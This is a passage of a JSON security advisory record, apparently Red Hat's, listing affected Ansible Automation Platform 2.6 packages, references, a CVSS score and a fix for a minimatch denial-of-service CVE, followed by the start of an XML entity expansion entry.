"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27904"
},
{
"category": "external",
"summary": "RHBZ#2442922",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442922"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27904",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27904"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74",
"url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74"
}
],
"release_date": "2026-02-26T01:07:42.693000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-31T16:12:45+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6277"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions"
},
{
"cve": "CVE-2026-29074",
"cwe": {
"id": "CWE-776",
"name": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)"
},
"discovery_date": "2026-03-06T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
